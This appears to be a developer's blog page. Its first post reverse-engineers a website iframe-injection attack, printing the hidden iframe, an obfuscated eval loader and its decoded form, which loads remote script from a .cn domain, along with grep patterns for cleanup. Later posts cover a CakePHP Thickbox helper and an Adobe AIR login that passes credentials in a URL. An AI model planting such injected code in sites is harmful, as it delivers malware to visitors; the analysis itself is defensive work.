25 May

Reverse Engineering & removing new enhanced HTML Iframe Injection attack

No Comments »
Latest Developments

I’ve spent many hours fixing this ongoing latest Iframe injection trend lately, And I’ve noticed one thing, every time our team fixes it up – it comes back in a new enhanced form which is difficult to delete automatically. Like the first time it began with:

<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

After that, code got better and less readable. And now the final version looks like this:

<!–

(function(KWaP){var hSgtJ=’:76a:72:20a:3d:22ScriptEngine:22:2c:62:3d:22:56:65rs:

69on()+:22:2cj:3d:22:22:2cu:3dn:61vigato:72:2eus:65:72:41gent:3bif((u:2einde:78Of(:

22Chrom:65:22):3c0:29:26:26(u:2e:69nd:65:78Of(:22Win:22):3e0):26:26(:75:2eindex:

4ff(:22:4eT:206:22):3c0):26:26(d:6f:63um:65nt:2ecookie:2ei:6edex:4ff(:22miek:3d1:

22):3c0):26:26:28:74y:70e:6f:66(:7arvz:74s:29:21:3dtyp:65:6ff:28:22A:22))):

7bz:72:76zt:73:3d:22A:22:3be:76al(:22if(:77indow:2e:22+:61+:22)j:3dj+:22+:61+:22:

4dajo:72:22+b+:61+:22Mi:6eo:72:22+b:2ba+:22B:75ild:22+:62+:22j:3b:22):

3bdocument:2ewrite(:22:3c:73:63r:69:70:74:20src:3d:2f:2fma:22:2b:22rt:75z:2e:63n:

2f:76i:64:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73cript:3e:22):3b:7d’;

eval(unescape(hSgtJ.replace(KWaP,’%')))})(/\:/g);

–>

Let’s reverse engineer it for fun. See that little evil eval()? Replace it by alert() or any other logger function like console.log() for Firebug. That will give us:

<!–

var a=”ScriptEngine”,b=”Version()+”,j=”",u=navigator.userAgent;if((u.indexOf(”Chrome”)<0)&&(u.indexOf(”Win”)>0)&&(u.indexOf(”NT 6″)<0)&&(document.cookie.indexOf(”miek=1″)<0)&&(typeof(zrvzts)!=typeof(”A”))){zrvzts=”A”;

eval(”if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);document.write(”<script src=//ma”+”rtuz.cn/vid/?id=”+j+”><\/script>”);}

–>

That *.cn domain is back again. To find this new injection, common pattern you need to lookup is as below:

3bdocument:2ewrite(:

Some other patterns you might want to check:

document.write(’<iframe

www.zj5173.com

How to clean your website?

Use ‘grep’ command or any other tool for Windows like PowerGrep. Other possible idea for an advanced user to avoid these attacks is to use a version control tool, and keep your site as a checked out copy. The advantage using this method is that you’ll know all the modified files just by issuing simple “svn status” command.

 

You can also contact us directly if you need assistance on this. We’ve helped securing over 50+ websites in last 3 months.

11 Feb

Thickbox Helper for CakePHP

2 Comments »
CakePHP, Latest Developments

It's quite difficult to copy-paste JavaScript for same thing again and again. That's why I've come up with Thickbox helper for CakePHP – as a result of a project which involved lot of thickboxes implementations. For those who don't know what it is be sure to check Thickbox jQuery Plugin.

To use it, just include this helper in your controller and Its implementation is very simple:

1. For inline content:

PLAIN TEXT
PHP:
  1. <?
  2. $thickbox->setProperties(array('id'=>'domId', 'height'=>'300', 'width'=>'334')); // set height, width and DOM ID
  3. $thickbox->setPreviewContent('click me'); // the link which will trigger thickbox on click
  4. $thickbox->setMainContent('<div>see it??</div>'); // the content which will be shown in thickbox
  5. echo $thickbox->output();
  6. ?>

 

2. For AJAX:

PLAIN TEXT
PHP:
  1. $thickbox->setProperties(array('id'=>'domId','type'=>'ajax','ajaxUrl'=>'/controller/action'));
  2. $thickbox->setPreviewContent("Click me to see thickbox");
  3. echo $thickbox->output();

Here's the helper:

PLAIN TEXT
PHP:
  1. <?php
  2. class ThickboxHelper extends AppHelper {
  3.  
  4.     var $helpers = array('Javascript', 'Html');
  5.    
  6.     /**
  7.      * Set properties - DOM ID, Height and Width, Type of thickbox window - inline or ajax
  8.      *
  9.      * @param array $options
  10.      */
  11.     function setProperties($options = array())
  12.     {
  13.         if(!isset($options['type']))
  14.         {
  15.             $options['type'] = 'inline';
  16.         }
  17.         $this->options = $options;
  18.     }
  19.    
  20.     function setPreviewContent($content)
  21.     {
  22.         $this->options['previewContent'] = $content;
  23.     }
  24.  
  25.     function setMainContent($content)
  26.     {
  27.         $this->options['mainContent'] = $content;
  28.     }
  29.    
  30.     function reset()
  31.     {
  32.         $this->options = array();
  33.     }
  34.    
  35.     function output()
  36.     {
  37.         extract($this->options);
  38.         if($type=='inline')
  39.         {
  40.             $href = '#TB_inline?';
  41.             $href .= '&inlineId='.$id;
  42.         }
  43.         elseif($type=='ajax')
  44.         {
  45.             $ajaxUrl = $this->Html->url($ajaxUrl);
  46.             $href = $ajaxUrl.'?';
  47.         }
  48.                
  49.         if(isset($height))
  50.         {
  51.             $href .= '&height='.$height;
  52.         }
  53.         if(isset($width))
  54.         {
  55.             $href .= '&width='.$width;
  56.         }
  57.        
  58.        
  59.         $output = '<a class="thickbox" href="'.$href.'">'.$previewContent.'</a>';
  60.        
  61.         if($type=='inline')
  62.         {
  63.             $output .= '<div id="'.$id.'" style="display:none;">'.$mainContent.'</div>';
  64.         }
  65.        
  66.         unset($this->options);
  67.        
  68.         return $output;
  69.     }
  70.    
  71.     function beforeRender()
  72.     {
  73.         $out = $this->Html->css('/effects/css/thickbox.css').'<script src="'.$this->Html->url('/effects/js/thickbox-compressed.js').'"></script>';
  74.         $view =& ClassRegistry::getObject('view');
  75.         $view->addScript($out);
  76.     }
  77.  
  78. }
  79. ?>

 

You'll need to copy the thickbox files to /app/webroot/effects. You can keep it in any folder for that matter, but as our team is following plugins – it's made that way.

- Abhimanyu Grover

28 Feb

Killer Applications with CakePHP, JQuery and Adobe Air

6 Comments »
CakePHP, Latest Developments, jQuery

Have you ever wished to program desktop applications for your own web app? If you are like me, that is, most of the lazy web programmers… you never put your hands on any desktop language. Even though all of us knows what flexibility can be given to a web app if we develop its desktop based client.

I came across a new development framework, Adobe AIR, which lets you build cool desktop based application simply with web technologies. If you are good at HTML and AJAX you can easily start with this new framework. I was surprised to see that there are so many applications already using this. After just 3 hrs of experimentation with this, I started loving this new tool. It is very cool. Some advantages which impressed me are:

  • Real Fast: I built a stock market monitoring tool in just 3 hrs. It didn't look like I had to learn something new, everything went smooth. It was like developing AJAX enabled HTML pages and testing them in browser. Once you're done, you simply create xml configuration files, copy a JS from framework, compile it, and you're done.
  • Use your favorite JS Library: This is an amazing feature. My personal favorite is JQuery and I use it in almost every project. Please note: you have to have the latest version of JQuery to get it working with Adobe AIR. They recently patched for Adobe AIR only. I already wasted 30 minutes in solving security issues.
  • Cool CSS Extensions: Check this out.
  • Easy Debugging: Any errors/exceptions appear in command window.
  • Easy Drag and Drop: Super-easy functions like dragstart, drag, dragend, dragenter, dragover, dragleave, and drop.

Check out my stock market tool, just a basic version:

Everything is linked to a backend application which runs on CakePHP. Login function (UsersController::login) returns session_key to the desktop application if login is successful.

PLAIN TEXT
JavaScript:
  1. function process_login()<br />
  2. {<br />
  3. $("#status").html("Logging in...");<br />
  4. user=$('#user').attr('value');<br />
  5. pass=$('#pass').attr('value');<br />
  6. $.get("http://localhost/StockBack/users/login/"+user+"/"+pass, function(session_key){<br />
  7. if(session_key=='false')<br />
  8. {<br />
  9. $("#status").html("Unable to login");<br />
  10. }<br />
  11. else<br />
  12. {<br />
  13. $("#status").html("Logged in successfully");<br />
  14. $("#login").hide("slow");<br />
  15. $("#panel").show("slow");<br />
  16. }<br />
  17. });<br />
  18. }

(Sorry for posting code like this but my code editor in wordpress sucks – if anyone knows a good one, please recommend me)

To start learning, some important links are:

Developing Adobe AIR Applications with HTML and Ajax

Adobe AIR Quick Starts for HTML

Adobe AIR Language Reference for HTML Developers

The Adobe AIR HTML documentation set (a ZIP file) is available for download here:

http://www.adobe.com/go/learn_air_html_docs

« Older Entries

Hire us

Contact us to get a free quote on your project.